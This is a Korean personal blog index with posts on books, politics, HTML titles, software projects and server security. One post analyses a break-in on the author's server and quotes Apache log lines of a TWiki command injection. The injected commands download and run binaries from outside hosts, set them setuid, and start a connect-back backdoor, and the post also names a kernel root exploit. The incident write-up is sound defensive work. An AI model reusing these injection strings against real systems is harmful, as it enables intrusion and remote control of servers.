lastmind 공격 이후 조치

댓글 달기 / Uncategorized / /

지난 번 라마에 대한 공격 이후로, 보안에 대해 조금은 더 신경을 쓰게 되었습니다.

root 권한을 획득할 수 있는 overflow exploit은 제가 직접 실행해보아도 제대로 동작하지 않는 걸로 봐서, 실제로 root를 획득하는 데에는 실패한 것이 아닌가 판단하고 있습니다.

커널이나 중요한 파일들의 변경 시간과 사용자 계정 등을 검사해보았지만, 별다른 흔적은 발견할 수 없었습니다.

chkrootkit은 rootkit을 검사해주는 툴입니다. 일부의 rootkit을 검사하는 것일 뿐이지만, 일단 chkrootkit에 대해서 라마는 안전하더군요.

물론 어떤 것도 확실한 것은 없습니다. root를 얻은 후 모든 일을 한 후 흔적을 지우고 나갔다면, 제가 할 수 있는 일은 다른 분들 말씀대로 새로 설치하는 방법 밖에는 없죠.

적어도 외부로부터의 접근이 있는지를 알아내기 위해서 몇가지 툴을 설치해보았습니다.

COMPLETE guide to Snort, MySQL, and Acid란 글을 보고 Snort와 Acid를 설치했습니다. Snort는 상당히 유명한 IDS의 하나고, Acid는 Snort의 front-end 중 하나입니다. 시스템에 설치된 Acid는 다음 페이지에서 보실 수 있습니다.

Snort는 이더넷을 Promiscuous 모드로 하고, 네트워크 트래픽을 감시하면서 수상한 흔적이 있나 감시합니다. 이것도 커널, 디바이스 드라이버 수준에서 뭔가 바꿨다면 믿을 수는 없겠습니다만…

Snort를 개발한 SourceFire사는 Snort가 intrusion을 발견하기 위한 rule들을 유료/무료로 제공하고 있는데, 무료 룰(unregistered user release)은 유료 룰(registered user release)에 비해 업데이트가 느린 편이죠. 커뮤너티 룰이란 것도 있는데, 사용자들의 기여로 만들어지는 룰인 모양입니다. 현재는 무료 룰을 설치해놓은 상태인데, 무료 룰과 커뮤너티 룰 중에 어떤 것이 더 좋은 지 잘 모르겠군요.

연휴 동안에, kernel 업그레이드도 하고, integrity check을 할 수 있는 tripwire도 설치해 둘 생각입니다.

lastmind 공격 이후 조치 더 읽기"

<title />의 중요성

7 댓글 / Uncategorized / /

HTML 페이지에서 의외로 title element를 소홀히 취급하는 페이지들이 많다. 가장 흔히 볼 수 있는 경우는 페이지의 내용에 대한 제목이 아니라, 1) 사이트나 서비스의 이름을 제목으로 가지는 페이지들이다. 다른 한가지는 2) 제목이 아예 비어있는 경우다. HTML 4.01 specification은 분명히 title element가 페이지의 내용을 나타낼 수 있도록 규정하고 있다.

Authors should use the TITLE element to identify the contents of a document. Since users often consult documents out of context, authors should provide context-rich titles. Thus, instead of a title such as "Introduction", which doesn’t provide much contextual background, authors should supply a title such as "Introduction to Medieval Bee-Keeping" instead. [7.4.2 The TITLE element]

title element가 중요한 것은 단지 스펙 때문은 아니다. 웹을 사용할 때, 페이지에 관한 가장 기본적인 semantic을 표현하는 것이 바로 title element고, 실제 어플리케이션에서 여러가지로 활용되고 있다.

일단, title element는 대부분의 agent가 웹페이지를 보여줄 때 기본적으로 보여주어야만 하는 정보다. 대부분의 웹브라우저들은 물론 title element를 윈도우의 title bar 등에 표시해주거나 적어도 위쪽에 표시해주고 있다.

For reasons of accessibility, user agents must always make the content of the TITLE element available to users (including TITLE elements that occur in frames). The mechanism for doing so depends on the user agent (e.g., as a caption, spoken).[7.4.2 The TITLE element]

웹브라우저의 기본적인 기능 중 하나인 북마크를 할 때도 title element가 사용된다.

bookmark

검색 엔진들은 검색 결과에 해당하는 페이지들을 리스팅할 때 title element를 강조해서 보여준다. 만약 제목을 사이트의 이름과 같은 것으로 해놓는다면, 어느 누가 그 페이지를 열어보고 싶을까?

google

뿐만 아니라, 대부분의 검색 엔진은 크롤러가 수집한 페이지의 중요도를 평가하기 위해 title element를 우선적으로 사용한다. title element는 HTML 페이지에서 몇 안되는 semantic을 위한 element일 뿐만 아니라, 스펙에 의해 항상 존재함이 보장되는 정보다. HTML 초기 스펙부터 존재했던 element기 때문에 오래된 페이지라도 대체로 title element는 가지고 있기도 하다. 이러한 여러가지 점에서 title element가 가지고 있는 정보는 검색 엔진이 활용하기에 상당히 편리하다고 볼 수 있다.

한편, 라마(Last Mind의 줄임말)의 경우에는, 몇개월 전에 MT 템플릿을 정리하면서, 인덱스 템플릿을 개별 아티클 템플릿으로 복사해서 수정하는 바람에, 개별 아티클 페이지들의 제목이 전부 인덱스 페이지의 제목으로 리셋되는 사고가 발생했었다. 이후로 그 사고에 대해서 모르고 있다가, 최근에야 알아채고 수정할 수 있었는데, 그래서 구글은 바뀐 제목의 페이지를 반쯤 인덱싱한 상태다. 일반적으로, 제목이 제대로 달린 (한글 제목의) 페이지는 거의 구글의 첫 페이지에 나오지만, 그렇지 않은 페이지는 그렇지 않다. 제목의 중요성을 확인할 수 있는 대목이다.

자신의 페이지가 중요하다고 생각하고 그에 걸맞는 대우가 필요하다고 생각한다면, 먼저 title element를 제대로 대접해줘라.

<title />의 중요성 더 읽기"

Galaxy: Iteration 4 Plan

1개의 댓글 / Software Development / /

Introduction

Galaxy는 제가 개발 중인 웹기반의 RSS Feed Aggregator입니다. 다음은 Iteration 4의 개발 계획입니다.

Feature List

  • Refactoring
    • Improve Controller-View plumbing
    • Use ActiveRecord pattern
  • User Interface
    • "Mark Read" with AJAX (Say, AJAX view)
    • Item/Subscription Folding with javascript
    • Specify subscription category when adding subscription
  • Feature
    • Authentication (instead of HTTP Authentication)
    • DB Abstraction Layer (instead of Ruby/Mysql)
    • Minimize Apache Web Server dependency (how?)

Schedule

일단은 7월말까지 Iteration 4를 종료하고 0.2.0를 릴리즈하는 것을 목표로 하고 있습니다.

Update: 10월말로 수정합니다.

Galaxy: Iteration 4 Plan 더 읽기"

김승옥 소설전집 中 무진기행

댓글 달기 / Book / /

무진기행무진기행, 김승옥 소설전집 1, 김승옥, 문학동네, 2004

읽은 지가 오래되었으니, 작품 개개에 대한 얘기는 다음번으로 미루자. 대신, 책을 읽을 당시에 끄적거린 노트를 들여다보자.

무진은 어디에 있는 도시인가? 안개가 많은 도시라는 것을 볼 때, 바닷가 근처거나 호수가 있는 내륙지방(강원도)의 느낌이 난다. 읽다보면, 호남지방인가 하는 생각도 잠시 든다. 어디에 있는 도시인가는 별로 중요하지 않고, 오히려 별로 알려지지 않은 점이 중요한 것인가? 도시로부터의 도피처? 실락원?

영화 "생활의 발견"와의 관련성. 지방 도시에서 만난 여선생과의 정사라는 스토리라인. "우리 서로 솔직해지기로 해요"라는 대사.

서울과 무진의 공간적 대비. 서울은 이성이 지배하는 공간. 무진은 욕망이 지배하는 공간. 자의식과 무의식. 욕망(비이성)에의 옹호? 주인공의 이중성 자체도 비이성?

부조리극. Camus. 타인의 속물적 행동에 대한 비판과 주인공 자신의 속물적 행동.

사실 이 노트의 마지막 줄에 있는 ‘부조리극’이라는 단어가, 이 소설집 전체에 대한 내 느낌을 대면해준다고 볼 수 있을 것 같다. 작품마다 부조리의 현실, 주인공과 부조리와의 관계는 제각기 다르고, 주인공이 그러한 부조리에 대처하는 방법도 다르지만, 공통된 것은 바로 부조리를 다루고 있다는 것이다. 그리고, 그러한 점은 상당히 마음에 들었다. 나는 까뮈를 좋아한다.

그래도 전집이니까 붙어있는 작가 연표를 보고서 알아낸 것은 이 소설집에 있는 작품들은 김승옥 씨가 스무살 남짓하던 시절에 쓴 것들이란 것이다. 일상으로부터 부조리를 발견해내는 것은 이십대의 정신인 것 같다는 생각이 들었다. 십대가 아직 세상을 잘 몰라서 또는 정신적인 능력이 부족해서 그렇다고 치자면, 왜, 삼십대, 사십대는 아닌가. 이십대만이 가질 수 있는 그러한 정신이란 무엇일까.

어쩌면, 김승옥 씨의 삶 자체가 이러한 물음의 대답이 될 수 있을지도 모르겠다. 이렇게 치열한 작품들을 썼던 작가는 서른이 끝나갈 무렵 ‘광주사태’로 의욕을 잃고 절필을 하게 된다. 그리고, 이제 그는 "하나님에 의해서 내 영안이 열"렸다며 이제 "하나님의 진실을 드러내기 위"한 소설을 쓰겠다고 한다. 그의 치열한 정신을 읽은 나로서는 잘 상상이 가지 않는다. 어쩌면 이런 것이 삶일런지도 모른다.

김승옥 소설전집 中 무진기행 더 읽기"

정혜신

댓글 달기 / Politics / /

‘김대중 죽이기’의 서평을 쓰느라 책을 뒤적이다가, 재미있는 구절을 발견했다.

불행 중 다행히도 아직 우리 언론은 정치인들의 평가에 정신분석학을 도입하지는 않고 있다. 아니 다행이라고 볼 일은 아니다. 우리 언론은 정치보도에 있어서 아예 정신분석학의 흉내도 내지 않으면서 추리소설을 쓰는 경지에까지 이르렀으니 말이다. 특히 김대중에 관한 보도가 그러하다. (김대중 죽이기, 강준만, 개마고원, 1995)

강준만 씨가 아이디어를 줬는지 어쨌는지 몰라도, 불행히도 (?) 정혜신 씨는 정치인들의 평가에 정신분석학을 도입했다. 생각난 김에 정혜신 씨에 대한 얘기를 약간 해보자.

정신분석학은 ‘환자는 항상 옳다’는 대전제에서 출발한다. 의식 수준에서는 엉뚱하고 비논리적인 환자의 말이나 행동들도 무의식 수준에서는 그 사람의 핵심동기를 드러내는 일정한 법칙이 존재하기 때문이다. 그래서 겉으로 나타난 말만으로 헛소리라고 무가치하게 여겨서는 안된다. 이것은 마케팅에서 말하는 ‘고객은 언제나 옳다’는 말과는 조금 다르다. 시장에서 말하는 고객만족은 지극히 의식적 수준의 개념인데 반해 정신분석학은 철저하게 대상의 무의식 차원에 주목한다. 의도를 가진 특정집단이나 개인에 대해서는 명징한 의식의 차원에서 옳고 그름을 따져봐야 하지만 민심이란 본질적으로 민중의 무의식이 투사된 개념이다. 그런 면에서 민심은 언제나 옳다, 고 나는 생각한다. (정신분석학으로 본 노 대통령, 정혜신, 한겨레)

정신분석학의 옳고 그름을 떠나서, ‘환자는 항상 옳다’는 명제가 옳다고 가정해보자. 환자의 무의식이 드러낸다는 핵심동기는 언제나 헛소리로 들릴 뿐이다. 그것을 올바르게 해석하는 것이 정신분석학자의 일일테다. 민심에 대한 정혜신 씨의 정치철학도 옳다고 가정해보자. 그렇다면, 헛소리로 들리는 민심을 올바르게 해석하는 것도 대통령을 비롯한 정치인의 역할이라고 볼 수 있지 않은가?

위의 얘기도 어디까지나 너그럽게 모든 것이 옳다는 가정 아래서의 얘기다. 정혜신 씨가 결국 하고 싶은 얘기는 뭔가? 민심은 (말그대로) 옳으므로 대통령은 이를 따라야한다는 것이다. 이는 일종의 정치철학이자 정치적 의견이다. 특히나, 연정을 둘러싼 특정 사안에 대한 의견일 것이다. 이러한 논지를 펼치는데 정혜신 씨의 정신분석학은, 의식과 무의식 운운은 얼마나 도움이 되는가? 그가 동원한 정신분석학은 얼마나 과학적 정합성을 가지고 적용되었는가? 그것은 적합한가?

정혜신 씨의 정치적 의견이 아무리 옳다고 하더라도, 정신분석학 운운은 봐줄 수가 없다. 일종의 ‘지적 사기’다.

Update: 이상한 모자님의 한겨레의 정신분석학도 읽어보자.

이 경우의 ‘정신분석학으로 본’ 이란 수사는 노무현 대통령의 정책적 경향에 대해 ‘개인적’ 조언을 하겠다는 알리바이에 불과한 것이다.

정혜신 더 읽기"

김대중 죽이기

2 댓글 / Book / /

김대중 죽이기, 강준만, 개마고원, 1995

김대중을 다루고 있고, 또 그를 상당히 옹호하고 있기 때문에, 대선 때면 흔히 나오는 대통령 후보자 선전 책자처럼 여길 사람이 있을지도 모르겠다. 하지만, 이 책은 옹호를 위한 책이라기 보다는 비판을 위한 책이다. 그 대상은 바로 언론과 지식인이다.

전반부에서는 김대중에 대한 내용을 다루고 있다. 책이 쓰여질 당시(1995년)의 김대중에 대한 이미지란 어떤 것인가를 보여주는 것만으로도 상당히 흥미로운데, 그것이 왜 잘못되었고 또 어떻게 조작되었는가를 조목조목 밝혀주고 있다.

김대중에 대한 얘기가 나오면 당연히 지역감정 문제가 나온다. 그 문제의 핵심을 강준만 씨는 언론과 정치평론을 하는 지식인, 그리고 국민의 문제로 보고 있다.

후반부에서는 그러한 문제를 집중해서 다루고 있다. 추리소설을 쓰는 기자, 연예기사를 방불케하는 정치보도, 언론의 이미지 조작 등 우리가 현재 언론에 대해 내리는 평가 – 언론의 문제점들을 잘 정리하고 있다. ‘좆선’이라는 단어가 없던 시절이었던 것을 감안하면 상당히 도전적인 책이 아니었을까 상상해본다. 지식인들의 양비론적이고 정치혐오주의적인 정치평론들도 쓰레기라고 얘기한다.

그의 ‘김대중 옹호’ 중 몇가지는 어떤 사람들의 (자신도 그 근거를 모르는) 김대중 이미지에 대한 신뢰에 금이 가게하지는 못할테고, 아마도 그들은 불편함을 느낄 것이다. 그런 것들을 비판하는 것은 좋지만 부차적인 일이다. 강준만 씨가 주장하고 있는 언론과 지식인의 문제가 우리 모두가 해결해야할 중요한 문제임은 대부분이 동감하리라고 믿는다.

전체적으로 언론이나 정치인, 지식인을 비판하기 위한 상당히 많은 양의 자료를 인용하고 있어서, 약간 놀랐다. 분명히 그런 자료들을 인용하지 않아도 논지 전개에는 문제가 되지 않았을지는 모르겠지만, 그러한 자료들이 이 책의 객관성에 상당한 도움을 주고 있는 것은 사실이다.

대학교를 다닐 때까지도 정치에 대한 혐오를 가지고 있었고, 어린 마음에 무정부주의자를 자처했었다. 그것이 깨어진 것은 강준만 씨의 ‘노무현과 국민사기극’과 김규항 씨의 ‘B급 좌파’를 읽고난 후 였는데, 강준만 씨의 이 책을 좀 더 일찍 읽었더라면, 좀 더 빨리 정치에 대한 올바른 시각을 가질 수 있지 않았을까 싶다.

김대중 죽이기 더 읽기"

lastmind.net security breached

2 댓글 / Uncategorized / /

우연히 top을 해봤더니, krad라는 프로세스가 CPU를 모두 차지하면서 동작하고 있더군요. 거기에 r0nin이라는 이름의 프로세스도 눈에 띄더군요. 순간 hack 당했다는 느낌이 들더군요. 역시나, 구글링해보니, 일종의 code injection 공격이더군요.

apache log를 살펴보니, 다음과 같은 내용이 있었습니다.

GET /twiki/bin/view/Main/TWikiUsers?rev=2%20|wget http://64.18.139.66/~mota/ntfu.txt%00 HTTP/1.1
GET /twiki/bin/view/Main/TWikiUsers?rev=2%20|perl ntfu.txt%00 HTTP/1.1
GET /twiki/bin/view/Main/TWikiUsers?rev=2%20|uname%20-a%00 HTTP/1.1
GET /twiki/bin/view/Main/TWikiUsers?rev=2%20|wget%20www.groupiys.net/xpl/dc%00 HTTP/1.1
GET /twiki/bin/view/Main/TWikiUsers?rev=2%20|chmod%204777%20dc%00 HTTP/1.1
GET /twiki/bin/view/Main/TWikiUsers?rev=2%20|./dc%00 HTTP/1.1
GET /twiki/bin/view/Main/TWikiUsers?rev=2%20|./dc%20203.81.226.10%206432%00 HTTP/1.1
GET /twiki/bin/view/Main/TWikiUsers?rev=2%20|wget%20www.groupiys.net/xpl/r0nin%00 HTTP/1.1
GET /twiki/bin/view/Main/TWikiUsers?rev=2%20|chmod%204777%20r0nin%00 HTTP/1.1
GET /twiki/bin/view/Main/TWikiUsers?rev=2%20|./r0nin%00 HTTP/1.1
GET /twiki/bin/view/Main/TWikiUsers?rev=2%20|./dc%20203.81.226.10%206432%00 HTTP/1.1
GET /twiki/bin/view/Main//TWikiUsers?rev=2%20|wget%20http://64.18.139.66/~mota/ntfu.txt%00 HTTP/1.1

그리고 twiki/bin과 /tmp에는 ntfu.txt, dc, krad, r0nin과 같은 파일들이 생겨있었습니다. apache를 통해서 생성된 파일들이기 때문에 apache user로 되어있었습니다.

보시다시피, 웹 어플리케이션을 통해서 shell command를 injection하고있는 것을 볼 수 있습니다. 구글링에서 찾은 건 My eGallery라는 웹 어플리케이션의 버그를 이용한 것인데 lastmind의 경우에는 제가 사용하고 있는 TWiki버그를 이용한 공격이었습니다.

이 문제는 제가 사용하는 버전인 2004년 9월 1일 릴리즈 이 후 이틀에 걸쳐서 수정된 문제임에도 불구하고, (그리고 security vulnerability에 대한 메일을 받았음에도 불구하고) 저같은 풀타임도 아닌 게으른 관리자가 관리하는 서버는 이러한 공격에 취약할 수 밖에 없는 것 같습니다. 어쨌든 2004년 9월 3일 릴리즈로 업그레이드 해서 이 문제는 해결했습니다.

대충 살펴보면, 주로 back door 종류인 듯 한데, lastmind에서 무슨 짓을 했는지는 아직 파악되지 않았습니다. 스팸 메일을 보낼까 해서 일단 sendmail을 내려놓은 상태입니다. krad라는 프로세스는 ‘kill -9’로 죽지도 않아서 reboot을 해야만 했는데, 흥미롭게도 다음과 같은 내용을 담고 있더군요.

$ strings krad

[1;37m k-rad.c – linux 2.6.* CPL 0 kernel exploit
[1;37mDiscovered Jan 2005 by sd <sd@fucksheep.org>

역시 구글링을 해보니, 리눅스 커널 2.6.x에 해당하는 sys_epoll_wait를 이용한 overflow exploit이라는 것이 밝혀졌습니다. kernel memory를 overwrite해서 root shell까지 실행할 수 있는 exploit인데, root를 가로채고 무슨 짓을 했을지 모르겠군요.

공격을 당한 그 날 발견한 것은 상당히 행운이라고 볼 수는 있겠습니다만… 피해 상황은 좀 더 조사해봐야겠습니다.

lastmind.net security breached 더 읽기"

Shuffle에 Miranda 설치하기

4 댓글 / Uncategorized / /

Miranda in Shuffle

Shuffle에 Firefox를 설치해서 잘 사용하고 있습니다. 학교에서나 방학 때 현장실습 했던 회사에서도 유용하더군요. 개강해서 PC실에 들러서 놀고 있는데, 갑자기 Google Talk를 쓰는 친구가 잘 살아있나 확인하고 싶어졌습니다. 역시 PC실에는 소프트웨어를 설치할 수 없기 때문에, 셔플에 뭔가를 깔아야겠다고 생각했습니다. Google Talk는 안될 것 같고 (실제로 되는 지는 모르겠습니다) … 아, lunamoth님이 얘기했던 Miranda가 어떨까요? 의외로 간단하게, zip format의 Miranda 배포판을 다운로드 받아서 셔플에 풀어놓는 것으로 모든 것이 해결되더군요.

MSN, Jabber, IRC 외의 다른 모듈은 다 내리고, 적당히 설정해주는 것으로 쓸만하게 되었습니다. Jabber 모듈을 Google Talk 쪽으로 접근하도록 설정하는 것은 Google의 가이드lunamoth님의 가이드를 따랐습니다. 왜 그런지 모르겠지만, Google의 것에는 OpenSSL 파일을 설치해주는 것이 빠져있죠.

아이콘 모음을 하나 받아서 설정해주었습니다. amicons라는 건데요. 괜찮습니다. 스킨은 마음에 드는 것을 찾기가 힘들어서 그만 뒀습니다. 기본 대화창조차도 플러그인으로 되어있는데, 폰트를 설정할 수 있는 것이 없어서 좀 불편하더군요. 역시, 적당한 대체 플러그인을 못찾겠습니다. 좋은 거 알고 계시면 좀 알려주세요.

gaim 외에 멀티프로토콜 메신저는 처음 사용해보았는데요. gaim에 비해 장점이라면, 인터페이스를 변경하는 것이 gaim에 비해 좀 더 자유로운 것 같다는 것입니다. 사실, 기본 인터페이스만 보자면 gaim과 별로 다를 것도 없긴 하죠. 그러고보면, gaim은 GTK+도 깔아주고 해야하니까, Shuffle에 설치하기는 좀 불편할 것 같기도 하네요. (따로 패키지가 있으려나요.) 데스크탑에서는 다양한 메신저들(MSN, Skype, Google Talk, Tachy, Nateon)을 사용하고 있긴 하지만, 아직은 데스크탑에서 멀티프로토콜 메신저를 사용할 생각은 들지 않네요.

Shuffle에 Miranda 설치하기 더 읽기"

Trusted Computing Group

댓글 달기 / Uncategorized / /

Microsoft’s Machiavellian manoeuvring by Bruce Schneier

Trusted Computing Group (이하, TCG)은 Microsoft, Sony, AMD, Intel, IBM, Sun, HP와 같은 메이저 IT 업체들을 주축으로 하고 있는 컨소시엄이다. TCG의 기본 아이디어는 하드웨어와 소프트웨어가 어떻게 서로를 신뢰할 수 있는가 하는 문제를 해결하기 위한 것이다. 예를 들면, 하드웨어가 OS의 신뢰성을 보장하고, OS가 어플리케이션의 신뢰성을 보장해주는 식이다.

(예전에 저작권에 관한 이슈가 불거질 때, 태준형과 많은 얘기를 나누면서 TCG에 대해서 듣게 되었고, TCG에 대해서도 많은 얘기를 했었다. 다음 내용들은 그 얘기들에 기초하고 있다.)

예컨대, DVD의 불법적인 복제를 막고 싶다고 하자. 현재의 PC에서는 DVD의 내용이라고 할 수 있는 영상과 음성은 어떻게든 하드웨어와 소프트웨어를 거쳐 사용자에게 전달이 되어야하기 때문에 DVD에 담긴 데이터에 접근하는 모든 하드웨어와 소프트웨어를 막는 것만이 궁극적인 해결책이 될 수 있다. 여기에는 DVD 롬과 OS, DVD를 재생하는 소프트웨어, 그래픽 카드, 심지어 모니터도 포함될 것이다. 이러한 하드웨어와 소프트웨어의 요소 중 하나라도 복제를 방지하도록 설계되어있다는 보장이 없다면, 그 DVD에 담긴 데이터는 절대로 그러한 요소로 전달되어서는 안되는 것이다. 가장 간단한 방법은 PC와 같은 열린 플랫폼 보다는 DVD Player들, XBOX나 Playstation과 같은 닫힌 플랫폼을 선택하는 것이다. 하지만, 그러한 닫힌 플랫폼들은 그 특성상 PC 시장을 완전히 대체할 수는 없으며, 분명 아직도 전쟁중이다. TCG의 노력은 아마도 열린 플랫폼에서도 신뢰의 보장을 구현해보자는 것이다.

분명히 이것은 가치가 있다고 생각된다. 우리나라 은행 사이트들에만 들어가면 잡다하게 설치되는 ActiveX들은 짜증스럽다. 기본적으로 우리나라의 은행들은 절대로 사용자들과 사용자들의 PC를 믿을 수 없다는 것인데, 이것이 valid한 의견이든 아니든 간에, 은행들의 욕구를 충족시키면서 ActiveX를 없애고 싶다면, 은행 사이트들은 키로깅 소프트웨어나 백도어가 없거나 영향을 미칠 수 없다는 보장을 OS로부터 받을 수 있어야할 것이다. OS는 은행 사이트로의 모든 형태의 접근에 대한 다른 소프트웨어나 하드웨어의 접근을 통제할 수 있으니까 말이다. 물론, 그 OS를 믿을 수 있는가하는 문제는 또 다른 방법으로 (예를 들어, 하드웨어를 통한 인증) 해결할 수 있을 것이다. 제대로 된 TPM이 PC에서 구현이 된다면, 우리는 현재보다는 좀 더 편하게 인터넷 뱅킹을 할 수 있으리라고 생각한다.

하지만, 문제는 있다. TCG 또는 TCG의 회원사들은 항상 선한 의도만을 가지고 있는 것은 아니기 때문이다. TCG라는 조직 자체가 일종의 권력이며, TCG의 외부에 있는 하드웨어 또는 소프트웨어 회사들은 그 권력에 의한 피해를 입을 수 있는 여지가 있다. 뿐만 아니라, TCG가 컨텐츠 산업의 이익을 대변하며 디지털 컨텐츠를 절대로 복제할 수 없도록 하는 세상이 될 수도 있을 것이다. (간혹 영화에 나오듯이 더럽고 어두운 지하에서 펑크족 머리를 하고 주인공에게 불법적으로 복제를 해주는 세상말이다.)

Bruce Schneier는 TCG가 내놓은 문서인 Design, Implementation, and Usage Principles for TPM-Based Platforms을 소개하면서 이와 같은 우려를 표시한다.

That sounds good, but what does "security" mean in that context? Security of the user against malicious code? Security of big media against people copying music and videos? Security of software vendors against competition? The big problem with TCG technology is that it can be used to further all three of these "security" goals, and this document is where "security" should be better defined.

하지만, 이 문서는 TCG의 선한 의도를 표명하고 있고, Bruce Schneier도 이 문서에 쓰여진대로만 따른다면 그것은 좋은 가이드라인이라고 평가한다.

Complaints aside, it’s a good document and we should all hope that companies follow it. Compliance is totally voluntary, but it’s the kind of document that governments and large corporations can point to and demand that vendors follow.

Bruce Schneier가 한가지 더 우려하고 있는 것은 Microsoft의 행동이다. Microsoft는 TCG의 회원이지만, 이 문서의 기초를 더디게 만드려고 했다고 한다. 그 이유는 Windows Vista의 출시 이 후에 이 문서가 발표되도록 해서, Vista가 결국 이 문서의 영향을 받지 않도록 하기 위한 것이었다는 것이다. 물론 정확한 증거가 없는 의심이기는 하지만, Microsoft의 행보를 생각하면, 그냥 무시해버릴만한 생각은 아니다.

Trusted Computing Group 더 읽기"